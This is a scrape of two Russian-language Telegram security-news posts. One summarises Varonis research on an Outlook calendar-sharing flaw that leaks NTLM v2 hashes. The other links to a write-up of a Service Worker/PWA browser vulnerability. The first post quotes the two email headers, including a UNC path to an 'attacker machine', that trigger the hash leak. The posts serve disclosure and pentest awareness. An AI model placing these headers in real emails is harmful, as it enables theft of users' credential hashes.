Команда Varonis обнаружила новую багу в функции обмена календарями в Microsoft Outlook, при котором добавление двух заголовков в электронное письмо заставляет Outlook делиться контентом и связываться с указанной машиной, создавая возможность перехвата хэша NTLM v2.
К слову, это новый способ получения NTLM-хэшей среди двух других новых способов: с помощью Windows Performance Analyzer и проводника Windows.
Для тех, кто не знает, NTLM v2 — это криптографический протокол, используемый Windows для аутентификации пользователей на удаленных серверах. Хотя NTLM v2 является более безопасной версией оригинального NTLM, v2 все еще уязвим для атак методом брутфорса и не только.
📌 Те самые заголовки Outlook:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
Всеволод Кокорин, исследователь безопасности в SolidLab, делится историей нахождения уязвимости и описывает технические аспекты, которые привели к её возникновению. Сама уязвимость существовала в течение длительного времени и была устранена в октябре 2023 года.
📌 Вы узнаете про Service Worker + PWA, про аспекты, связанные с Payment Request API и спецификацией JIT-installed воркеров, а также про то, как архитектурные решения в веб-приложениях могут привести к серьезным багам.
👉 Читать
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤3🥰3